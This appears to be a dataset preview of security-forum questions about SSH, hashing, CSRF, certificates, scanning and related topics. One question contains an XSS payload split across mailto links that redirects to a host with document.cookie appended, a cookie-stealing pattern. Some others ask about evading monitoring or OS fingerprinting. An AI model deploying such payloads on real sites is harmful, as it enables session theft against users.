instruction stringlengths 24 29.9k |
|---|
Is is the same as a public key in RSA, except they made it more suitable for self-signed hosts? What happens behind the scenes when our ssh client presents it to us?
|
I have a web service (PHP & MySQL on Ubuntu 12.04) running in a corporate intranet. I have also connected it to internet through a firewall letting incoming connections on HTTPs only (port 443). I'm considering now to add VPN over it to add additional security level, to open VPN ports and close HTTPs. That seems to be ... |
I keep reading about situations where a hacker could "easily" brute force a password (most recent example) but I'm confused about when some has an opportunity to do this kind of thing. If it is a website/web service, aren't attempts like this rate limited? I.e. I can't try my Amazon password 50 million times per second... |
Is there any reason why an -sS scan (or most others) would not report an open port that doesn't have a service attached to it?
For example, in a regular -sS scan, the following port will be missing, but when I scan that port specifically, it appears as open.
PORT STATE SERVICE
2509/tcp open unknown
|
From what I read, scrypt is (on paper) more secure than bcrypt, but it's pretty new so it's better to let it get time-tested and scrutinized first. However, is there any good, compelling reason to assume that it won't stand up to scrutiny?
|
My company uses a private PKI to handle such scenarios such as
Mutual auth (TLS) to a website using client certificates
SSL web server certificates on an Intranet (once a VPN session is established.)
S/MIME secure email.
Activesync authentication
When upgrading Android to Kitkat the presence of a non-default root ce... |
We all know that we're supposed to take a fairly slow hashing algorithm, salt the password, and run the hash for many iterations. Let's say that I'm following almost everything except for one rule, and I have a static salt. Something like this:
password = 'yaypuppies' + some_static_salt
1000.times do
password = am... |
I've just acquired a new CentOS server, which will be hosting a Ruby on rails application, it is public facing. What should I do to secure this server?
|
Assume, I have an executable which hooks the API CreateFileW located in Kernel32.dll which is shared globally across the system for all other processes. From hooking I mean, that I have overwritten the prologue of CreateFileW
jmp Hook_CreateFileW
nop
// ...rest of original CreateFileW code...
My Doubt::
From what I kn... |
I am trying to understand same origin policy better. From what I understand same origin policy restricts code from one "origin" not access data from another "origin". What I am trying to understand is the context of this code. I can see that code across two tabs (example1.com and example2.com) cannot access data in eac... |
I've been asked to implement digital signatures for documents at work. I really need to read up more on the matter but several searches didn't make an obvious approach stand out.
Main features I would like to see represented in a solution are:
Insert a scanned image of the user's real paper-and-ink signature into an O... |
http://en.wikipedia.org/wiki/Advanced_Configuration_and_Power_Interface#Security_Risk
Ubuntu Linux founder Mark Shuttleworth has likened ACPI to Trojan
horses.[28] He has described proprietary firmware (firmware ACPI or
any other firmware) as a security risk, saying that "firmware on your
device is the NSA's bes... |
I have a question regarding one step of protection more than salt/hash. I work on an application that is distributed to many clients and then deployed on their networks. If I set a password on one instance of the application and then look up the generated salt and hash in the database, what mechanism can stop me from... |
Network scanning tools such as nmap have the capability to infer operating system version based upon lower-level system details. EG: TCP/IP stack behavior, etc. Are there any known methods to trick these tools to either report the wrong OS or to confuse them so they cannot correctly detect an OS?
|
I'm currently trying to improve our API to be more restful, therfore avoid any state on the server. I want to accomplish this with a hmac token, appended on every request.
The hmac will be made with the following data-part: host, request-method, request-uri, timestamp(to avoid replays) and in case of POST/PUT also the ... |
When submitting HTML that contains entities to the OWASP HTMLSanitzer, entities are converted.
For example:
BEFORE: <p>blah blah blah ♦</p>
The resulting HTML ends up looking like this:
AFTER: <p>blah blah blah ?</p>
The entity is converted back to it's original unicode character.
Why does OWASP do that? Ar... |
I've just taken over administering a lab of Apple computers on a university campus. We have about 15 computers and I've discovered that they all have public IPs and domain names. Even our printer is accessible from the Internet, which is probably the most terrifying.
I tried running a port scan on the computers in my ... |
I want to audit the HTTP and HTTPS activity of apps downloaded onto my mobile device. What is the best way to do this?
I own the device, can add a root certificate, and can connect the running device using USB to a computer and run diagnostic tools.
I can also run in whatever developer mode exists to see the network I... |
I am sort of new to SSL.
During a SSL connection establishment, I see that the server is sending multiple certificates.
Can someone help me to understand why the server is sending multiple certificates?
And how can I do the same with openssl, apache or gnutls server?
Thanks in advance.
** Update **
Thank you for all t... |
I just opened a new bank account which comes with internet banking. Unlike the others I have used so far, this one requires a personal certificate (a .p12 file stored on my computer) + password for authentication instead of standard username + password. This method is rather inconvenient... I have to store the certific... |
Why is it that some security advisers recommend using an 8 character password with upper, lower, digits, and symbols while banks only use a 4 digit number pin for debit and 3 digit pin for credit card?
Isn't it a risk for security using a short non-random password like that?
|
How can I technically verify* that the e-mail I'm sending from Gmail to Yahoo is encrypted all the way from Gmail's servers to Yahoo's servers? I know that it's advised to have encryption between the mail service provider and the client's desktop, e.g. using IMAPS or SMTPS, and when using a web interface, HTTPS. But if... |
I'm interested in protecting email messages from NSA-style snooping, but don't want to incur additional legal risk in doing so.
In other words, does SMIME encryption and/or signing cause a given email message to have more legal "power" than a message sent over TLS, PGP, DMARC, or similar technology such as an encrypted... |
I'm writing up documentation and want to ensure that I'm using proper terminology.
1) What is the proper technical term for the SMTP tunnel encryption standard that typically starts on TCP/25, involves checking ESMTP capabilities for 250-STARTTLS and issuing the STARTTLS command (followed by negotiation, public cert e... |
say there are three players: A, B, C where A is local machine, B is ssh server, C is the final destination.
through ssh local port forwarding, A can connect to C via B.
So then data will be following the path A--B--C in order to communicate each other.
Let say C was originally designed to only allow connection from B b... |
Is possible (and practical) for two users to create their own self-signed SSL certificates, exchange these certificates (perhaps in a face-to-face meeting), and then communicate with each other securely (e.g. S/MIME)? No CA involved here.
|
I'm writting a ebook and I'm gonna to sell it soon.
I'd sell it at Google Play Store, but here in Brazil they don't accept PayPal as payment (and many brazilian don't have a credit card), so I think that the best option is to sell it by myself.
I could sell it also at Amazon, but the Kindle format just sucks when you w... |
I have a web interface to a hardware that is primarily used to reboot the hardware. Reboot can be done only by authenticated user.The web interface is written in CGI/shellscript. It does not use any session/cookies.
It is one time authentication through lighttpd ldap authentication. No cookies are transferred on browse... |
I've been reading over the logs on my honeypot and discovered the following messages that seem to be either gibberish or a cypher message:
kernel: v0 neigfradn tt
kernel: [2108296.63083] devc nt nee rmcosmd
kernel: [2110073.035288] host 192.168.122.184/if4 ignores redirects or 12181214t 9.6.2.8.r1ve0 neigfradn tt
kerne... |
I work at government organization. We would like to become Intermediate CA so that we can provide SSL certificates to our branch organizations. We must be able to do code signing, green address bar etc,. I heard that we can be intermediate CA provided that we prove our identity because we are governmental organization.... |
Is there a way to deterministically create an RSA private-key for an X.509 certificate, ideally through a library which has been vetted already?
i.e. user enters some phrase like "this is my private group", and that seed value is used to generate a private RSA key which I can then use as a certificate authority. But in... |
I am new to this kind of stuff (HTTPS etc.) and pretty much confused on how to go ahead with this.
An LDAP server (ApacheDS) at the back-end stores the user details. To add new users, the user creation form can be provided as web service over HTTPS.
As per this mail chain, LDIF files should better have userPassword as ... |
I can imagine that for sensitive systems logging to a central logging server it can be handy to be able to verify the integrity of the logs. Each line can either be signed or a shared secret may be used (HMAC) to add an additional field before sending it off to a central logging server.
I was wondering what is generall... |
How can we solve CryptAcquireCertificatePrivateKey fails with 0x8009200B when adding certificate from smartcard to local user store?
In an enrollment system where users generate smartcard certificate request online to a CA, the certificate is loaded 'offline' in the smartcard, for example several days after the request... |
My ESET Smart Security 7 detected incoming connection from an external computer, since Rundll32 can be run by any programs on my computer and I don't know which program is doing this, so I am concerned.
Is there a way to check which program waiting and accepting this external connection from the Internet?
|
I am new at using and programming web applications, so I wanted to ask a question. Is it safe to execute os commands like copy and mv and delete from a web app that is running on an apache, or does it bring up security issues?More specific I am using django, and I want a view of mine when it is executed to be able to r... |
Is it possible to white list an IP address in mod_security?
I found white ist whole domain name in mod_security. But I want to white list only the administrator IP.
OS: CentOS 6
Server: Apache httpd 2.15
Mod Security: Version 2.7
|
In fcrackzip man they say :
the more files you provide, the better.
I want to know why. What's the method it uses to retrieve the password?
|
Several clarifying questions:
Is it possible to disable the SSH encryption using options at the OpenSSH server/client or some appropriate hack?
Is it possible to do this at the time of the transmission, of course with full control over the server?
Are there known servers/clients (except OpenSSH), which allow you to do... |
This question is mainly aimed at OpenID Connect, when it is fully realized.
I understand the aversion to signing in with a social networking site, but from what I understand about OIDC, its supposed to finally allow developers to simply implement OIDC once and have it work with every provider.
Once this happens and peo... |
Today there are news on Bruce Schneier's blog and ArsTechnica about how NY City released information about Cab/Taxi drivers, their trips, and so on.
Basically, sensitive information was simply MD5 hashed. Since the input was limited (3 numbers, 3 letters, at most), it was easy to make some brute-force attack: generate ... |
I'm on WordPress trying to keep spambots from grabbing email addresses that may be in The Content. WordPress has a nifty little function simply called antispambot() which will convert the email address into HTML Entities.
no-reply@domain.com converts to:
no-reply@domain.&... |
I have a specific IP that has been iterating through the directories on my site testing for something. Here is an example of what it keeps trying to hit:
http://<site>/<path>/change._change<br>
http://<site>/<path>/beforeactivate._change<br>
http://<site>/<path>/click._change<br>
http://<site>/<path>/propertychange._ch... |
Working with a developer to update a login system through a web-UI:
Currently, we use:
Enter login ID
Goes through Challenge/Step-up
Based on results: Challenge/Step-up User is presented the password page to login
They are wanting to change the flow to:
Enter login ID
User is immediately presented the password page
... |
Bruce Schneier's blog drew my attention to algorithm substitution attacks which may leak symmetric keys through IV or padding or other covert channels, encrypted with escrow keys. The major premise is that cryptolibraries (or HSMs, or encryption chips) have been subverted by a "benevolent government agency".
Does this ... |
I'm going every year at big IT conferences (3k->4k people). Everyone is connected to the internet with wifi on laptops. This wifi is open, everyone can read the traffic and analyse it... The risk is nearly the same on wifi in hotel, hotspot etc.. except you have a concentration of interesting informations and hacking c... |
I've been inspired by a question over on Code Review, which boils down to: What is the proper way to authenticate a user without a database?
Would it be the exact same process if you stored credentials in an array, or an XML file, or even just a plain ol' text file?
For example, let's examine the following PHP code:
$c... |
I am nearing a point where I will deploy my Django application to the hostile environment otherwise known as "the internet" and I'm trying to better understand the ramifications of the Django SECRET_KEY. One of the standard procedures it seems is to secure the secret key in the settings.py. Fair enough. The docs go so ... |
How can I view the Credentials stored in Windows?
Is there any possible way to view the stored password?
I can just export them..
|
I want to set up a password management system on a home machine running Debian, and for this I'm considering only non-proprietary, open source password-managers available through Debian1.
I'd like to make the master password, or rather, passphrase, to the password-managing application very long2. In fact, I want to ma... |
I have been given the task of defining a process for assigning administrative access. One of the requirements for this processs is that if a subject wishes to gain adminstrative access, only the subject's manager can make the request for the client. Both the VPs of IT and Security must approve the request. How does thi... |
I am familiar with the basic workings of HTTP Auth, but how does it keep track of authentication between page views? I see there is no cookie created when the initial authentication takes place.
|
Why doesn't software automatically detect password-cracking attacks, and thwart them?
Long version:
Suppose that someone tries a brute-force password-cracking attack on some program XYZ that requires password authentication.
My understanding is that such an attack would consist of iterating over the set of "all possib... |
Rather than adopting a universal standard, many websites develop their own guidelines for how passwords should be constructed.
When you consider the number of passwords the average person today has to create and track, this creates problems for those who have a method for constructing and remembering passwords. For in... |
I am working on making a log file for a small application. If an error occurs in the application then I have to send a mail to a person. I've figured out the code to send a mail to a person, but I don't want to hard code the password as a string. Instead I want to encrypt it and then de-crypt it in my python code. alte... |
I was recently reading about buffer overflows and dangling pointers. I read "Smashing the stack for fun and Profit " by Aleph1 and that paper was really clear and concise in explaination. On the contrary when I search for dangling pointers, I get some resources on what they are. I also found a BlackHat presentation abo... |
Right now, we might do something like password varchar(72), when defining a password column, with for example BCrypt. But there's a lot of folks that don't do this very effectively. Maybe they just put the plaintext, or a single unsalted md5 hash, or some other terrible strategy.
But virtually all these offenders still... |
I read the RFC document, it mentioned that there are some kinds of client certificate type.
So I don't understand what does this type mean.
For a instance, one type named rsa_fixed_ecdh, it said, the certificate must be signed with RSA.
What is the ECDH used for, for the key exchange? How does it work?
|
I was in the middle of implementing a CSRF protection mechanism for my server when I realized that this attack only really affects web browsers. It got me wondering: why should I bother generating/validating CSRF tokens for non-browser clients?
Not only would removing such checks simplify the implementation of REST cli... |
In REF to http://threatpost.com/ipmi-protocol-bmc-vulnerabilities-expose-thousands-of-servers-to-attack and the hacks of several companies and web hosts have been hit and had their servers wiped from remote management hacking.
What can one do to protect their web based remote management ports?
So far I've begun isola... |
I'm trying to help my friend understand this because he believes that since a site is very popular, that it's less likely to infect its viewers because of its security! Is a popular site less likely to infect its viewers?
Please answer this question as detailed as possible so I can direct him to this site.
|
Consider following 2 disk wipe procedures, using only vanilla Windows installation:
First do a quick-format to make the disk appear empty, then do one of these:
Just do full format of the disk.
Bitlocker-encrypt the entire drive (all space) using a strong key which is then thrown away, leaving disk unusable until form... |
If I download something, such as a TV series from a filesharing site via the Tor browser - saving the file to my PC - then put it on a flash drive, will my IT department see that I am downloading this?
|
I have a dispute with my father about the following ...
I want to make a website (with MySql database) and use the root/index - page for BOTH the log in entry for normal visitors AND log in for admins.
My father does not agree as he said the following ...
You should NEVER use the same page for both visitors and admins ... |
I've been confused about how it is possible to compromise a Facebook user's account simply if that user clicks a link. Recently a friend of mine on Facebook posted a series of links to what appeared to be some kind of Phishing scam. "99% of people couldn't watch this for more that 1 minute!!!" etc etc. We've all seen i... |
Can someone know my IP address through Thunderbird email attachments?
Can a cunning attacker manage to find my IP address through attachment 'images' in emails that I unsuspectingly open?
|
When an average person sees an email, he can see only part of an information enclosed in the mail. To see full information one can look at the source of an email, which shows more. Example of an email source looks like this:
Received: via dmail-2008.19 for +INBOX;
Tue, 3 Feb 2009 19:29:12 -0600 (CST)
Received: ... |
1) User is logged in bank.com in one tab, where everything is secured by CSRF tokens. Then he opens evil.com in another tab.
2) Javascript in evil.com might try to make a POST request to bank.com/send_money only if it knew csrf_token.
3) In order to reveal csrf_token, javascript in evil.com might try to do GET ajax ca... |
I came to know the SQL truncation vulnerability that I wasn't aware of.
It is my understanding that this vulnerability is based on the fact that MySQL truncates the value of an "insert query" whether the value exceeds the width of the corresponding column.
The fist appearance of this vulnerability is in CVE-2008-4106 w... |
This application analyzes web traffic and then beautifully displays attacks on a global map. How does it intercept web traffic so it can analyze it? Isn't web traffic private to everyone except to ISPs and powerful government agency like the NSA? How does it detect and differentiate MYSQL attacks from regular MySQL que... |
I was trying to search for this, but could not find the answer anywhere - apology in advance if already answered.
I have a Linux desktop installed on a thumb drive, which I keep in my pocket. This way, if I need to access my bank (from a public computer and otherwise), I boot from it so I don't need to worry about key ... |
I have AirPort Extreme network card and when I try to use airmong-ng on kali linux in a virtual machine this does not work. I know I need a usb-network card if I want to make this work but if I boot kali from a cd or usb do I still need this because then I won't be sharing internet with my macbook and it saves 30 buck... |
I'm part of a small office in the middle of nowhere, and we just got absorbed into a large mega corporation.
Sometimes we watch porn, at the office, on company computers, using the company Internet. It makes good for a good background distraction. (I know I'm not the only one who does this so don't judge me.)
No, there... |
How much information is released when paying with a debit card?
Is it possible for a vendor to grab your name and address from your debit card and send you things in the mail?
|
I want to display some very sensitive information on a web page and I want to make sure that nobody, except the user in front of the browser, is able to access this information. I'm aware that in general is it not a good idea, but some site manage to do it. For example : LastPass
What are the security risk to consider?... |
I'm planning to make a simple remote administration tool with the basic features that are available on all other rats in the market. However, I'm really worrying about legal issues after marketing it.
Is what I'm doing a legal thing ? If not, how can I make it legal ?
Any hints would be highly appreciated.
|
I'm doing a project about security transactions and i'm wondering if to establish a connection based on https both client and server need to have a ssl implementation installed to preform the handshake protocol.
Anyone could help me out here?
Cumps.
|
I'm building an API with both protected and public endpoints, and I'm protecting it with OAuth 2's various flows. I want this API to be open to the world - the main consumer website won't even be on the same origin as the API server. So I'm planning to implement CORS.
Many texts warn about malicious third parties "send... |
I access work on my personal mac via a remote desktop connection..I do this on a mac and access it via safari. My question is, can my company then see what I am browsing in Firefox while connected to the remote desktop in safari?
|
I have a section of my web site that I only want reachable from another portion of my web site. I know that referer spoofing is trivially easy. But, if all requests from an incorrect referrer are met with 303 redirects to an index page, is there any way for the client to determine that the referrer is the criteria on w... |
I am a college student and I am getting free wifi for using the "Hostel campus" facility. To access the Internet, I have to put a proxy IP address to my browser.
I have heard that they can see all the sites I visit, so if I want to visit a porn site, it could definitely get me into trouble. I tried using VPN, but it w... |
I know that you can easily trigger a series of POST/GET to a target website using an iframe as I have done it in the past to manipulate session variable on my sites.
My question is more about : what information could I get from another website that I load into an iframe?
If I'm right, the same origin policy is supposed... |
Some CSRF protection mechanisms are vulnerable to attackers who can write cookies. Others are not but incur extra complexity or computational cost.
Help me understand the cost/benefit. What conditions enable attackers to write cookies for a domain?
|
I do have a big CA bundle certificate file and each time if i get request to add new certificate to the existing bundle i need to make sure it is not present already. How i can validate the duplicates.
The alignment of the certificate within the bundle seems to be different.
Example:
Cert 1
MIIF7DCCBNSgAwIBAgIQbsx6pacD... |
I'm attempting to check for malware, spam and any kind of injection/exploitation on a sql dump that has been provided and was wondering what kind of tools are there already in place to help with this?
Edit:
As suggested by an admin I should expand this question out to include the scenario I'm facing. Well it basically ... |
It wouldn't be far-fetched to guesstimate that at least 50% of the web traffic can be intercepted in 2014.
However, a guesstimate of active interception attacks is likely an order of magnitude lower — probably well below 0,5%, and, apparently, a lot of it is done by the governments, which could potentially have control... |
N players are playing a perfect information game (the kind of game where everyone knows moves of everyone) by making moves by turn (P1, P2, ..., Pn, P1, ..., Pn, ... till the game will finish). Game has specific rules for every player (if a player makes a move against the rules - he loses automatically) and can finish ... |
Other than testing different URLs separately, is there anyway to find out if a website has a wildcard sub domain?
|
I'm a Software Engineer, but I have no experience in security, so i'm trying to learn by doing (woot Experiential learning!).
I know that the permission settings on the tmp folder are very relaxed. If I have an IP address of a server/computer can i ssh into the tmp folder without requiring the password of the server/c... |
I recently uploaded images of my passport and driver's license to a Certificate Authority (CA) to apply for SSL certificates. The submission was rejected because I have added watermarks to prevent data theft. I explained to the Cert Master that the watermarks do not block any important details on my passport and driver... |
Reading up on attacks against AES i have seen countless examples of why ECB is bad, and the logic behind it i can understand, but i can't get my head around how these attacks actually work in the real world.
So the big example that i see getting used a lot is a session token that is encrypted with AES-ECB, and as its ... |
I have REST api that is using access token which is sent either in header or as url query. I don't use cookies at all.
Am I still vulnerable to CSRF attacks? I know that I would if I would use cookies since other tab can send request and cookies will be sent as well but in my case Headers/UrlParam won't be sent at all.... |
Quoting Wikipedia:
A password with, say, 42 bits of strength calculated in this way would be as strong as a string of 42 bits chosen randomly[.]
Assuming that interpretation is correct, combined with knowledge that cracking a random 256-bit number is infinitely expensive nay physically impossible, how can a passphras... |
Suppose we have 2 webapps, appA and appB.
They communicate via REST. Say for example, when appA updates let's say, a file, it should inform appB via REST and so on.
I was thinking, how do I make this secure? I mean, what if an ordinary user got the api url and started sending requests? I was looking around the interne... |
I have an Actiontec V1000H router/modem. I have been having virus issues recently so I done a factory reset on all but 1 of the computers on the network. I went to add in a Port Forwarding exception so my son can run a Minecraft server, and the port forwarding rules list had about 50 entries on there. I know in the ... |
<a href='mailto:</a><script>/*'></a><script>/*</a>:
<br>
<hr>
<a href='mailto:*/location.href=/*'>*/location.href=/*</a>:
<br>
<hr>
<a href='mailto:*/"http://127.0.0.1/"/*'>*/"http://127.0.0.1/"/*</a>:
<br>
<hr>
<a href='mailto:*/+document.cookie;/*'>*/+document.cookie;/*</a>:
<br>
<hr>
<a href='mailto:*/</sc... |
As per an honourable mention in an answer for « Why self-signed https is less trustworthy than unencrypted http? », it appears that there are already two post-Snowden drafts that have to do with the exact topic of opportunistic encryption of http traffic:
Opportunistic Encryption for HTTP URIs
https://datatracker.ietf... |
I am trying to generate a certificate through OpenSSL which has the following line
X509v3 Certificate Policies:
Policy: X509v3 Any Policy
But I end up getting
X509v3 Certificate Policies:
Policy: itu-t
What change do I need in my openssl.cnf to get "X509v3 Any Policy"?
I don't see any itu-t reference in my ... |
If you look at this subCA Certificate from Verisign http://www.tbs-certificats.com/FAQ/en/495.html?p=en/495.html
It has the following field
1.3.6.1.5.5.7.1.12:
0_.].[0Y0W0U..image/gif0!0.0...+..............k...j.H.,{..0%.#http://logo.verisign.com/vslogo.gif
How can I create a cert using openssl commandline which h... |
When I run the openssl command
openssl x509 -noout -text -in certname
on different certs, on some I get a serial number which looks like this.
Serial Number: 256 (0x100)
On others, I get one which looks like this
Serial Number:
41:d7:4b:97:ae:4f:3e:d2:5b:85:06:99:51:a7:b0:62
The certificates I create using ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.